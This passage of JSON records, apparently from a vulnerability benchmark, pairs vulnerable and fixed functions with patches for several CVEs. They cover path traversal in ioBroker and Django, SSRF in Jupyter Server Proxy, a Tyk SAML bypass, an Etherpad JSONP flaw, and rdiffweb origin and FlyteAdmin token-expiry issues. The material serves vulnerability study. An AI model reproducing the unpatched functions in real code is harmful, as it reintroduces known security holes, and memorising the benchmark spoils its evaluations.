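    if not 0 <= idx <= len(items):
        raise IndexError("Unable to access invalid index: %d" % idx)
    return items[:idx] + [value] + items[idx:]
```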
**Note:** The attacker has to be logged in if the authentication is enabled (by default isn't enabled).", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/ioBroker/ioBroker.js-controller", "patch_url": ["https://github.com/ioBroker/ioBroker.js-controller/commit/f6e292c6750a491a5000d0f851b2fede4f9e2fda"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_181_1", "commit": "fbdbfbd", "file_path": "lib/objects/objectsUtils.js", "start_line": 464, "end_line": 485, "snippet": "function sanitizePath(id, name, callback) {\n if (name[0] === '/') name = name.substring(1);\n\n if (!id) {\n if (typeof callback === 'function') {\n callback('Empty ID');\n }\n return;\n }\n\n if (id) {\n id = id.replace(/\\.\\./g, ''); // do not allow to write in parent directories\n }\n\n if (name.indexOf('..') !== -1) {\n name = path.normalize(name);\n name = name.replace(/\\\\/g, '/');\n }\n if (name[0] === '/') name = name.substring(1); // do not allow absolute paths\n\n return {id: id, name: name};\n}"}], "fix_func": [{"id": "fix_js_181_1", "commit": "f6e292c", "file_path": "lib/objects/objectsUtils.js", "start_line": 464, "end_line": 491, "snippet": "function sanitizePath(id, name, callback) {\n if (name[0] === '/') name = name.substring(1);\n\n if (!id) {\n if (typeof callback === 'function') {\n callback('Empty ID');\n }\n return;\n }\n\n if (id) {\n id = id.replace(/[\\]\\[*,;'\"`<>\\\\?\\/]/g, ''); // remove all invalid characters from states plus slashes\n }\n\n if (name.includes('..')) {\n name = path.normalize('/' + name);\n name = name.replace(/\\\\/g, '/');\n }\n if (name.includes('..')) {\n // Also after normalization we still have .. in it - should not happen if normalize worked correctly\n name = name.replace(/\\.\\./g, '');\n name = path.normalize('/' + name);\n name = name.replace(/\\\\/g, '/');\n }\n if (name[0] === '/') name = name.substring(1); // do not allow absolute paths\n\n return {id: id, name: name};\n}"}], "vul_patch": "--- a/lib/objects/objectsUtils.js\n+++ b/lib/objects/objectsUtils.js\n@@ -9,11 +9,17 @@\n }\n \n if (id) {\n- id = id.replace(/\\.\\./g, ''); // do not allow to write in parent directories\n+ id = id.replace(/[\\]\\[*,;'\"`<>\\\\?\\/]/g, ''); // remove all invalid characters from states plus slashes\n }\n \n- if (name.indexOf('..') !== -1) {\n- name = path.normalize(name);\n+ if (name.includes('..')) {\n+ name = path.normalize('/' + name);\n+ name = name.replace(/\\\\/g, '/');\n+ }\n+ if (name.includes('..')) {\n+ // Also after normalization we still have .. 
in it - should not happen if normalize worked correctly\n+ name = name.replace(/\\.\\./g, '');\n+ name = path.normalize('/' + name);\n name = name.replace(/\\\\/g, '/');\n }\n if (name[0] === '/') name = name.substring(1); // do not allow absolute paths\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-23365", "cve_description": "The package github.com/tyktechnologies/tyk-identity-broker before 1.1.1 are vulnerable to Authentication Bypass via the Go XML parser which can cause SAML authentication bypass. This is because the XML parser doesn\u2019t guarantee integrity in the XML round-trip (encoding/decoding XML data).", "cwe_info": {"CWE-287": {"name": "Improper Authentication", "description": "When an actor claims to have a given identity, the product does not prove or insufficiently proves that the claim is correct."}}, "repo": "https://github.com/TykTechnologies/tyk-identity-broker", "patch_url": ["https://github.com/TykTechnologies/tyk-identity-broker/commit/243092965b0f93a95a14cb882b5b9a3df61dd5c0"], "programing_language": "Go", "vul_func": [{"id": "vul_go_88_1", "commit": "366a9db", "file_path": "providers/saml.go", "start_line": "31", "end_line": "31", "snippet": "var CertManager = certs.NewCertificateManager(nil, \"\", nil)"}], "fix_func": [{"id": "fix_go_88_1", "commit": "2430929", "file_path": "providers/saml.go", "start_line": "31", "end_line": "31", "snippet": "var CertManager = certs.NewCertificateManager(nil, \"\", nil, false)"}], "vul_patch": "--- a/providers/saml.go\n+++ b/providers/saml.go\n@@ -1 +1 @@\n-var CertManager = certs.NewCertificateManager(nil, \"\", nil)\n+var CertManager = certs.NewCertificateManager(nil, \"\", nil, false)\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-21697", "cve_description": "Jupyter Server Proxy is a Jupyter notebook server extension to proxy web services. Versions of Jupyter Server Proxy prior to 3.2.1 are vulnerable to Server-Side Request Forgery (SSRF). Any user deploying Jupyter Server or Notebook with jupyter-proxy-server extension enabled is affected. A lack of input validation allows authenticated clients to proxy requests to other hosts, bypassing the `allowed_hosts` check. Because authentication is required, which already grants permissions to make the same requests via kernel or terminal execution, this is considered low to moderate severity. Users may upgrade to version 3.2.1 to receive a patch or, as a workaround, install the patch manually.", "cwe_info": {"CWE-918": {"name": "Server-Side Request Forgery (SSRF)", "description": "The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination."}}, "repo": "https://github.com/jupyterhub/jupyter-server-proxy", "patch_url": ["https://github.com/jupyterhub/jupyter-server-proxy/commit/fd31930bacd12188c448c886e0783529436b99eb"], "programing_language": "Python", "vul_func": [{"id": "vul_py_186_1", "commit": "8610a3b", "file_path": "jupyter_server_proxy/handlers.py", "start_line": 211, "end_line": 236, "snippet": " def get_client_uri(self, protocol, host, port, proxied_path):\n context_path = self._get_context_path(host, port)\n if self.absolute_url:\n client_path = url_path_join(context_path, proxied_path)\n else:\n client_path = proxied_path\n\n # Quote spaces, \\u00e5\\u00e4\\u00f6 and such, but only enough to send a valid web\n # request onwards. 
To do this, we mark the RFC 3986 specs' \"reserved\"\n # and \"un-reserved\" characters as safe that won't need quoting. The\n # un-reserved need to be marked safe to ensure the quote function behave\n # the same in py36 as py37.\n #\n # ref: https://tools.ietf.org/html/rfc3986#section-2.2\n client_path = quote(client_path, safe=\":/?#[]@!$&'()*+,;=-._~\")\n\n client_uri = '{protocol}://{host}:{port}{path}'.format(\n protocol=protocol,\n host=host,\n port=port,\n path=client_path\n )\n if self.request.query:\n client_uri += '?' + self.request.query\n\n return client_uri"}, {"id": "vul_py_186_2", "commit": "8610a3b", "file_path": "jupyter_server_proxy/handlers.py", "start_line": 688, "end_line": 738, "snippet": "def setup_handlers(web_app, serverproxy_config):\n host_allowlist = serverproxy_config.host_allowlist\n rewrite_response = serverproxy_config.non_service_rewrite_response\n web_app.add_handlers('.*', [\n (\n url_path_join(\n web_app.settings['base_url'],\n r'/proxy/([^/]*):(\\d+)(.*)',\n ),\n RemoteProxyHandler,\n {\n 'absolute_url': False,\n 'host_allowlist': host_allowlist,\n 'rewrite_response': rewrite_response,\n }\n ),\n (\n url_path_join(\n web_app.settings['base_url'],\n r'/proxy/absolute/([^/]*):(\\d+)(.*)',\n ),\n RemoteProxyHandler,\n {\n 'absolute_url': True,\n 'host_allowlist': host_allowlist,\n 'rewrite_response': rewrite_response,\n }\n ),\n (\n url_path_join(\n web_app.settings['base_url'],\n r'/proxy/(\\d+)(.*)',\n ),\n LocalProxyHandler,\n {\n 'absolute_url': False,\n 'rewrite_response': rewrite_response,\n },\n ),\n (\n url_path_join(\n web_app.settings['base_url'],\n r'/proxy/absolute/(\\d+)(.*)',\n ),\n LocalProxyHandler,\n {\n 'absolute_url': True,\n 'rewrite_response': rewrite_response,\n },\n ),\n ])"}], "fix_func": [{"id": "fix_py_186_1", "commit": "fd31930", "file_path": "jupyter_server_proxy/handlers.py", "start_line": 211, "end_line": 240, "snippet": " def get_client_uri(self, protocol, host, port, proxied_path):\n if self.absolute_url:\n context_path = self._get_context_path(host, port)\n client_path = url_path_join(context_path, proxied_path)\n else:\n client_path = proxied_path\n\n # ensure client_path always starts with '/'\n if not client_path.startswith(\"/\"):\n client_path = \"/\" + client_path\n\n # Quote spaces, \\u00e5\\u00e4\\u00f6 and such, but only enough to send a valid web\n # request onwards. To do this, we mark the RFC 3986 specs' \"reserved\"\n # and \"un-reserved\" characters as safe that won't need quoting. The\n # un-reserved need to be marked safe to ensure the quote function behave\n # the same in py36 as py37.\n #\n # ref: https://tools.ietf.org/html/rfc3986#section-2.2\n client_path = quote(client_path, safe=\":/?#[]@!$&'()*+,;=-._~\")\n\n client_uri = '{protocol}://{host}:{port}{path}'.format(\n protocol=protocol,\n host=host,\n port=port,\n path=client_path,\n )\n if self.request.query:\n client_uri += '?' 
+ self.request.query\n\n return client_uri"}, {"id": "fix_py_186_2", "commit": "fd31930", "file_path": "jupyter_server_proxy/handlers.py", "start_line": 693, "end_line": 746, "snippet": "def setup_handlers(web_app, serverproxy_config):\n host_allowlist = serverproxy_config.host_allowlist\n rewrite_response = serverproxy_config.non_service_rewrite_response\n web_app.add_handlers(\n \".*\",\n [\n (\n url_path_join(\n web_app.settings[\"base_url\"],\n r\"/proxy/([^/:@]+):(\\d+)(/.*|)\",\n ),\n RemoteProxyHandler,\n {\n \"absolute_url\": False,\n \"host_allowlist\": host_allowlist,\n \"rewrite_response\": rewrite_response,\n },\n ),\n (\n url_path_join(\n web_app.settings[\"base_url\"],\n r\"/proxy/absolute/([^/:@]+):(\\d+)(/.*|)\",\n ),\n RemoteProxyHandler,\n {\n \"absolute_url\": True,\n \"host_allowlist\": host_allowlist,\n \"rewrite_response\": rewrite_response,\n },\n ),\n (\n url_path_join(\n web_app.settings[\"base_url\"],\n r\"/proxy/(\\d+)(/.*|)\",\n ),\n LocalProxyHandler,\n {\n \"absolute_url\": False,\n \"rewrite_response\": rewrite_response,\n },\n ),\n (\n url_path_join(\n web_app.settings[\"base_url\"],\n r\"/proxy/absolute/(\\d+)(/.*|)\",\n ),\n LocalProxyHandler,\n {\n \"absolute_url\": True,\n \"rewrite_response\": rewrite_response,\n },\n ),\n ],\n )"}], "vul_patch": "--- a/jupyter_server_proxy/handlers.py\n+++ b/jupyter_server_proxy/handlers.py\n@@ -1,9 +1,13 @@\n def get_client_uri(self, protocol, host, port, proxied_path):\n- context_path = self._get_context_path(host, port)\n if self.absolute_url:\n+ context_path = self._get_context_path(host, port)\n client_path = url_path_join(context_path, proxied_path)\n else:\n client_path = proxied_path\n+\n+ # ensure client_path always starts with '/'\n+ if not client_path.startswith(\"/\"):\n+ client_path = \"/\" + client_path\n \n # Quote spaces, \\u00e5\\u00e4\\u00f6 and such, but only enough to send a valid web\n # request onwards. To do this, we mark the RFC 3986 specs' \"reserved\"\n@@ -18,7 +22,7 @@\n protocol=protocol,\n host=host,\n port=port,\n- path=client_path\n+ path=client_path,\n )\n if self.request.query:\n client_uri += '?' 
+ self.request.query\n\n--- a/jupyter_server_proxy/handlers.py\n+++ b/jupyter_server_proxy/handlers.py\n@@ -1,51 +1,54 @@\n def setup_handlers(web_app, serverproxy_config):\n host_allowlist = serverproxy_config.host_allowlist\n rewrite_response = serverproxy_config.non_service_rewrite_response\n- web_app.add_handlers('.*', [\n- (\n- url_path_join(\n- web_app.settings['base_url'],\n- r'/proxy/([^/]*):(\\d+)(.*)',\n+ web_app.add_handlers(\n+ \".*\",\n+ [\n+ (\n+ url_path_join(\n+ web_app.settings[\"base_url\"],\n+ r\"/proxy/([^/:@]+):(\\d+)(/.*|)\",\n+ ),\n+ RemoteProxyHandler,\n+ {\n+ \"absolute_url\": False,\n+ \"host_allowlist\": host_allowlist,\n+ \"rewrite_response\": rewrite_response,\n+ },\n ),\n- RemoteProxyHandler,\n- {\n- 'absolute_url': False,\n- 'host_allowlist': host_allowlist,\n- 'rewrite_response': rewrite_response,\n- }\n- ),\n- (\n- url_path_join(\n- web_app.settings['base_url'],\n- r'/proxy/absolute/([^/]*):(\\d+)(.*)',\n+ (\n+ url_path_join(\n+ web_app.settings[\"base_url\"],\n+ r\"/proxy/absolute/([^/:@]+):(\\d+)(/.*|)\",\n+ ),\n+ RemoteProxyHandler,\n+ {\n+ \"absolute_url\": True,\n+ \"host_allowlist\": host_allowlist,\n+ \"rewrite_response\": rewrite_response,\n+ },\n ),\n- RemoteProxyHandler,\n- {\n- 'absolute_url': True,\n- 'host_allowlist': host_allowlist,\n- 'rewrite_response': rewrite_response,\n- }\n- ),\n- (\n- url_path_join(\n- web_app.settings['base_url'],\n- r'/proxy/(\\d+)(.*)',\n+ (\n+ url_path_join(\n+ web_app.settings[\"base_url\"],\n+ r\"/proxy/(\\d+)(/.*|)\",\n+ ),\n+ LocalProxyHandler,\n+ {\n+ \"absolute_url\": False,\n+ \"rewrite_response\": rewrite_response,\n+ },\n ),\n- LocalProxyHandler,\n- {\n- 'absolute_url': False,\n- 'rewrite_response': rewrite_response,\n- },\n- ),\n- (\n- url_path_join(\n- web_app.settings['base_url'],\n- r'/proxy/absolute/(\\d+)(.*)',\n+ (\n+ url_path_join(\n+ web_app.settings[\"base_url\"],\n+ r\"/proxy/absolute/(\\d+)(/.*|)\",\n+ ),\n+ LocalProxyHandler,\n+ {\n+ \"absolute_url\": True,\n+ \"rewrite_response\": rewrite_response,\n+ },\n ),\n- LocalProxyHandler,\n- {\n- 'absolute_url': True,\n- 'rewrite_response': rewrite_response,\n- },\n- ),\n- ])\n+ ],\n+ )\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-3281", "cve_description": "In Django 2.2 before 2.2.18, 3.0 before 3.0.12, and 3.1 before 3.1.6, the django.utils.archive.extract method (used by \"startapp --template\" and \"startproject --template\") allows directory traversal via an archive with absolute paths or relative paths with dot segments.", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/django/django", "patch_url": ["https://github.com/django/django/commit/52e409ed17287e9aabda847b6afe58be2fa9f86a", "https://github.com/django/django/commit/05413afa8c18cdb978fcdf470e09f7a12b234a23", "https://github.com/django/django/commit/02e6592835b4559909aa3aaaf67988fef435f624", 
"https://github.com/django/django/commit/21e7622dec1f8612c85c2fc37fe8efbfd3311e37"], "programing_language": "Python", "vul_func": [{"id": "vul_py_9_1", "commit": "03a8678", "file_path": "django/utils/archive.py", "start_line": 151, "end_line": 179, "snippet": " def extract(self, to_path):\n members = self._archive.getmembers()\n leading = self.has_leading_dir(x.name for x in members)\n for member in members:\n name = member.name\n if leading:\n name = self.split_leading_dir(name)[1]\n filename = os.path.join(to_path, name)\n if member.isdir():\n if filename:\n os.makedirs(filename, exist_ok=True)\n else:\n try:\n extracted = self._archive.extractfile(member)\n except (KeyError, AttributeError) as exc:\n # Some corrupt tar files seem to produce this\n # (specifically bad symlinks)\n print(\"In the tar file %s the member %s is invalid: %s\" %\n (name, member.name, exc))\n else:\n dirname = os.path.dirname(filename)\n if dirname:\n os.makedirs(dirname, exist_ok=True)\n with open(filename, 'wb') as outfile:\n shutil.copyfileobj(extracted, outfile)\n self._copy_permissions(member.mode, filename)\n finally:\n if extracted:\n extracted.close()"}, {"id": "vul_py_9_2", "commit": "03a8678", "file_path": "django/utils/archive.py", "start_line": 193, "end_line": 213, "snippet": " def extract(self, to_path):\n namelist = self._archive.namelist()\n leading = self.has_leading_dir(namelist)\n for name in namelist:\n data = self._archive.read(name)\n info = self._archive.getinfo(name)\n if leading:\n name = self.split_leading_dir(name)[1]\n filename = os.path.join(to_path, name)\n if filename.endswith(('/', '\\\\')):\n # A directory\n os.makedirs(filename, exist_ok=True)\n else:\n dirname = os.path.dirname(filename)\n if dirname:\n os.makedirs(dirname, exist_ok=True)\n with open(filename, 'wb') as outfile:\n outfile.write(data)\n # Convert ZipInfo.external_attr to mode\n mode = info.external_attr >> 16\n self._copy_permissions(mode, filename)"}], "fix_func": [{"id": "fix_py_9_1", "commit": "02e6592", "file_path": "django/utils/archive.py", "start_line": 160, "end_line": 188, "snippet": " def extract(self, to_path):\n members = self._archive.getmembers()\n leading = self.has_leading_dir(x.name for x in members)\n for member in members:\n name = member.name\n if leading:\n name = self.split_leading_dir(name)[1]\n filename = self.target_filename(to_path, name)\n if member.isdir():\n if filename:\n os.makedirs(filename, exist_ok=True)\n else:\n try:\n extracted = self._archive.extractfile(member)\n except (KeyError, AttributeError) as exc:\n # Some corrupt tar files seem to produce this\n # (specifically bad symlinks)\n print(\"In the tar file %s the member %s is invalid: %s\" %\n (name, member.name, exc))\n else:\n dirname = os.path.dirname(filename)\n if dirname:\n os.makedirs(dirname, exist_ok=True)\n with open(filename, 'wb') as outfile:\n shutil.copyfileobj(extracted, outfile)\n self._copy_permissions(member.mode, filename)\n finally:\n if extracted:\n extracted.close()"}, {"id": "fix_py_9_2", "commit": "02e6592", "file_path": "django/utils/archive.py", "start_line": 202, "end_line": 224, "snippet": " def extract(self, to_path):\n namelist = self._archive.namelist()\n leading = self.has_leading_dir(namelist)\n for name in namelist:\n data = self._archive.read(name)\n info = self._archive.getinfo(name)\n if leading:\n name = self.split_leading_dir(name)[1]\n if not name:\n continue\n filename = self.target_filename(to_path, name)\n if name.endswith(('/', '\\\\')):\n # A directory\n os.makedirs(filename, 
exist_ok=True)\n else:\n dirname = os.path.dirname(filename)\n if dirname:\n os.makedirs(dirname, exist_ok=True)\n with open(filename, 'wb') as outfile:\n outfile.write(data)\n # Convert ZipInfo.external_attr to mode\n mode = info.external_attr >> 16\n self._copy_permissions(mode, filename)"}, {"id": "fix_py_9_3", "commit": "02e6592", "file_path": "django/utils/archive.py", "start_line": 138, "end_line": 143, "snippet": " def target_filename(self, to_path, name):\n target_path = os.path.abspath(to_path)\n filename = os.path.abspath(os.path.join(target_path, name))\n if not filename.startswith(target_path):\n raise SuspiciousOperation(\"Archive contains invalid path: '%s'\" % name)\n return filename"}], "vul_patch": "--- a/django/utils/archive.py\n+++ b/django/utils/archive.py\n@@ -5,7 +5,7 @@\n name = member.name\n if leading:\n name = self.split_leading_dir(name)[1]\n- filename = os.path.join(to_path, name)\n+ filename = self.target_filename(to_path, name)\n if member.isdir():\n if filename:\n os.makedirs(filename, exist_ok=True)\n\n--- a/django/utils/archive.py\n+++ b/django/utils/archive.py\n@@ -6,8 +6,10 @@\n info = self._archive.getinfo(name)\n if leading:\n name = self.split_leading_dir(name)[1]\n- filename = os.path.join(to_path, name)\n- if filename.endswith(('/', '\\\\')):\n+ if not name:\n+ continue\n+ filename = self.target_filename(to_path, name)\n+ if name.endswith(('/', '\\\\')):\n # A directory\n os.makedirs(filename, exist_ok=True)\n else:\n\n--- /dev/null\n+++ b/django/utils/archive.py\n@@ -0,0 +1,6 @@\n+ def target_filename(self, to_path, name):\n+ target_path = os.path.abspath(to_path)\n+ filename = os.path.abspath(os.path.join(target_path, name))\n+ if not filename.startswith(target_path):\n+ raise SuspiciousOperation(\"Archive contains invalid path: '%s'\" % name)\n+ return filename\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2021-3281:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/django\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\ncd tests && /workspace/PoC_env/CVE-2021-3281/bin/python ./runtests.py utils_tests.test_archive.TestArchiveInvalid.test_extract_function_traversal\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2021-3281:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/django\ngit apply --whitespace=nowarn /workspace/fix.patch\ncd tests && /workspace/PoC_env/CVE-2021-3281/bin/python ./runtests.py utils_tests.test_archive \n"} {"cve_id": "CVE-2018-6835", "cve_description": "node/hooks/express/apicalls.js in Etherpad Lite before v1.6.3 mishandles JSONP, which allows remote attackers to bypass intended access restrictions.", "cwe_info": {"CWE-20": {"name": "Improper Input Validation", "description": "The product receives input or data, but it does\n not validate or incorrectly validates that the input has the\n properties that are required to process the data safely and\n correctly."}}, "repo": "https://github.com/ether/etherpad-lite", "patch_url": ["https://github.com/ether/etherpad-lite/commit/626e58cc5af1db3691b41fca7b06c28ea43141b1"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_195_1", "commit": "d7c93b0", "file_path": "src/node/hooks/express/apicalls.js", "start_line": 8, "end_line": 29, "snippet": "var apiCaller = function(req, res, fields) {\n res.header(\"Content-Type\", \"application/json; charset=utf-8\");\n\n apiLogger.info(\"REQUEST, v\"+ req.params.version + \":\" + req.params.func + \", \" + 
JSON.stringify(fields));\n\n //wrap the send function so we can log the response\n //note: res._send seems to be already in use, so better use a \"unique\" name\n res._____send = res.send;\n res.send = function (response) {\n response = JSON.stringify(response);\n apiLogger.info(\"RESPONSE, \" + req.params.func + \", \" + response);\n\n //is this a jsonp call, if yes, add the function call\n if(req.query.jsonp)\n response = req.query.jsonp + \"(\" + response + \")\";\n\n res._____send(response);\n }\n\n //call the api handler\n apiHandler.handle(req.params.version, req.params.func, fields, req, res);\n}"}], "fix_func": [{"id": "fix_js_195_1", "commit": "626e58c", "file_path": "src/node/hooks/express/apicalls.js", "start_line": 8, "end_line": 29, "snippet": "var apiCaller = function(req, res, fields) {\n res.header(\"Content-Type\", \"application/json; charset=utf-8\");\n\n apiLogger.info(\"REQUEST, v\"+ req.params.version + \":\" + req.params.func + \", \" + JSON.stringify(fields));\n\n //wrap the send function so we can log the response\n //note: res._send seems to be already in use, so better use a \"unique\" name\n res._____send = res.send;\n res.send = function (response) {\n response = JSON.stringify(response);\n apiLogger.info(\"RESPONSE, \" + req.params.func + \", \" + response);\n\n //is this a jsonp call, if yes, add the function call\n if(req.query.jsonp && isVarName(response))\n response = req.query.jsonp + \"(\" + response + \")\";\n\n res._____send(response);\n }\n\n //call the api handler\n apiHandler.handle(req.params.version, req.params.func, fields, req, res);\n}"}], "vul_patch": "--- a/src/node/hooks/express/apicalls.js\n+++ b/src/node/hooks/express/apicalls.js\n@@ -11,7 +11,7 @@\n apiLogger.info(\"RESPONSE, \" + req.params.func + \", \" + response);\n \n //is this a jsonp call, if yes, add the function call\n- if(req.query.jsonp)\n+ if(req.query.jsonp && isVarName(response))\n response = req.query.jsonp + \"(\" + response + \")\";\n \n res._____send(response);\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-3457", "cve_description": "Origin Validation Error in GitHub repository ikus060/rdiffweb prior to 2.5.0a5.", "cwe_info": {"CWE-346": {"name": "Origin Validation Error", "description": "The product does not properly verify that the source of data or communication is valid."}}, "repo": "https://github.com/ikus060/rdiffweb", "patch_url": ["https://github.com/ikus060/rdiffweb/commit/afc1bdfab5161c74012ff2590a6ec49cc0d8fde0"], "programing_language": "Python", "vul_func": [{"id": "vul_py_420_1", "commit": "8becdaf", "file_path": "rdiffweb/tools/secure_headers.py", "start_line": 34, "end_line": 109, "snippet": "def set_headers(\n xfo='DENY',\n no_cache=True,\n referrer='same-origin',\n nosniff=True,\n xxp='1; mode=block',\n csp=\"default-src 'self'; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline'\",\n):\n \"\"\"\n This tool provide CSRF mitigation.\n\n * Define X-Frame-Options = DENY\n * Define Cookies SameSite=Lax\n * Define Cookies Secure when https is detected\n * Validate `Origin` and `Referer` on POST, PUT, PATCH, DELETE\n * Define Cache-Control by default\n * Define Referrer-Policy to 'same-origin'\n\n Ref.:\n https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html\n https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html\n \"\"\"\n request = cherrypy.request\n response = cherrypy.serving.response\n\n # Check if Origin matches our target.\n if 
request.method in ['POST', 'PUT', 'PATCH', 'DELETE']:\n origin = request.headers.get('Origin', None)\n if origin and not origin.startswith(request.base):\n raise cherrypy.HTTPError(403, 'Unexpected Origin header')\n\n # Check if https is enabled\n https = request.base.startswith('https')\n\n # Define X-Frame-Options to avoid Clickjacking\n if xfo:\n response.headers['X-Frame-Options'] = xfo\n\n # Enforce security on cookies\n cookie = response.cookie.get('session_id', None)\n if cookie:\n # Awaiting bug fix in cherrypy\n # https://github.com/cherrypy/cherrypy/issues/1767\n # Force SameSite to Lax\n cookie['samesite'] = 'Lax'\n if https:\n cookie['secure'] = 1\n\n # Add Cache-Control to avoid storing sensible information in Browser cache.\n if no_cache:\n response.headers['Cache-control'] = 'no-cache, no-store, must-revalidate, max-age=0'\n response.headers['Pragma'] = 'no-cache'\n response.headers['Expires'] = '0'\n\n # Add Referrer-Policy\n if referrer:\n response.headers['Referrer-Policy'] = referrer\n\n # Add X-Content-Type-Options to avoid browser to \"sniff\" to content-type\n if nosniff:\n response.headers['X-Content-Type-Options'] = 'nosniff'\n\n # Add X-XSS-Protection to enabled XSS protection\n if xxp:\n response.headers['X-XSS-Protection'] = xxp\n\n # Add Content-Security-Policy\n if csp:\n response.headers['Content-Security-Policy'] = csp\n\n # Add Strict-Transport-Security to force https use.\n if https:\n response.headers['Strict-Transport-Security'] = \"max-age=31536000; includeSubDomains\"\n\n\ncherrypy.tools.secure_headers = cherrypy.Tool('before_request_body', set_headers, priority=71)"}], "fix_func": [{"id": "fix_py_420_1", "commit": "afc1bdfab5161c74012ff2590a6ec49cc0d8fde0", "file_path": "rdiffweb/tools/secure_headers.py", "start_line": 34, "end_line": 109, "snippet": "def set_headers(\n xfo='DENY',\n no_cache=True,\n referrer='same-origin',\n nosniff=True,\n xxp='1; mode=block',\n csp=\"default-src 'self'; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline'\",\n):\n \"\"\"\n This tool provide CSRF mitigation.\n\n * Define X-Frame-Options = DENY\n * Define Cookies SameSite=Lax\n * Define Cookies Secure when https is detected\n * Validate `Origin` and `Referer` on POST, PUT, PATCH, DELETE\n * Define Cache-Control by default\n * Define Referrer-Policy to 'same-origin'\n\n Ref.:\n https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html\n https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html\n \"\"\"\n request = cherrypy.request\n response = cherrypy.serving.response\n\n # Check if Origin matches our target.\n if request.method in ['POST', 'PUT', 'PATCH', 'DELETE']:\n origin = request.headers.get('Origin', None)\n if origin and origin != request.base:\n raise cherrypy.HTTPError(403, 'Unexpected Origin header')\n\n # Check if https is enabled\n https = request.base.startswith('https')\n\n # Define X-Frame-Options to avoid Clickjacking\n if xfo:\n response.headers['X-Frame-Options'] = xfo\n\n # Enforce security on cookies\n cookie = response.cookie.get('session_id', None)\n if cookie:\n # Awaiting bug fix in cherrypy\n # https://github.com/cherrypy/cherrypy/issues/1767\n # Force SameSite to Lax\n cookie['samesite'] = 'Lax'\n if https:\n cookie['secure'] = 1\n\n # Add Cache-Control to avoid storing sensible information in Browser cache.\n if no_cache:\n response.headers['Cache-control'] = 'no-cache, no-store, must-revalidate, max-age=0'\n response.headers['Pragma'] = 'no-cache'\n 
response.headers['Expires'] = '0'\n\n # Add Referrer-Policy\n if referrer:\n response.headers['Referrer-Policy'] = referrer\n\n # Add X-Content-Type-Options to avoid browser to \"sniff\" to content-type\n if nosniff:\n response.headers['X-Content-Type-Options'] = 'nosniff'\n\n # Add X-XSS-Protection to enabled XSS protection\n if xxp:\n response.headers['X-XSS-Protection'] = xxp\n\n # Add Content-Security-Policy\n if csp:\n response.headers['Content-Security-Policy'] = csp\n\n # Add Strict-Transport-Security to force https use.\n if https:\n response.headers['Strict-Transport-Security'] = \"max-age=31536000; includeSubDomains\"\n\n\ncherrypy.tools.secure_headers = cherrypy.Tool('before_request_body', set_headers, priority=71)"}], "vul_patch": "--- a/rdiffweb/tools/secure_headers.py\n+++ b/rdiffweb/tools/secure_headers.py\n@@ -26,7 +26,7 @@\n # Check if Origin matches our target.\n if request.method in ['POST', 'PUT', 'PATCH', 'DELETE']:\n origin = request.headers.get('Origin', None)\n- if origin and not origin.startswith(request.base):\n+ if origin and origin != request.base:\n raise cherrypy.HTTPError(403, 'Unexpected Origin header')\n \n # Check if https is enabled\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-31145", "cve_description": "FlyteAdmin is the control plane for Flyte responsible for managing entities and administering workflow executions. In versions 1.1.30 and prior, authenticated users using an external identity provider can continue to use Access Tokens and ID Tokens even after they expire. Users who use FlyteAdmin as the OAuth2 Authorization Server are unaffected by this issue. A patch is available on the `master` branch of the repository. As a workaround, rotating signing keys immediately will invalidate all open sessions and force all users to attempt to obtain new tokens. Those who use this workaround should continue to rotate keys until FlyteAdmin has been upgraded and hide FlyteAdmin deployment ingress URL from the internet.", "cwe_info": {"CWE-613": {"name": "Insufficient Session Expiration", "description": "According to WASC, \"Insufficient Session Expiration is when a web site permits an attacker to reuse old session credentials or session IDs for authorization.\""}}, "repo": "https://github.com/flyteorg/flyteadmin", "patch_url": ["https://github.com/flyteorg/flyteadmin/commit/a1ec282d02706e074bc4986fd0412e5da3b9d00a"], "programing_language": "Go", "vul_func": [{"id": "vul_go_65_1", "commit": "f18839d", "file_path": "auth/authzserver/resource_server.go", "start_line": 30, "end_line": 42, "snippet": "func (r ResourceServer) ValidateAccessToken(ctx context.Context, expectedAudience, tokenStr string) (interfaces.IdentityContext, error) {\n\traw, err := r.signatureVerifier.VerifySignature(ctx, tokenStr)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tclaimsRaw := map[string]interface{}{}\n\tif err = json.Unmarshal(raw, &claimsRaw); err != nil {\n\t\treturn nil, fmt.Errorf(\"failed to 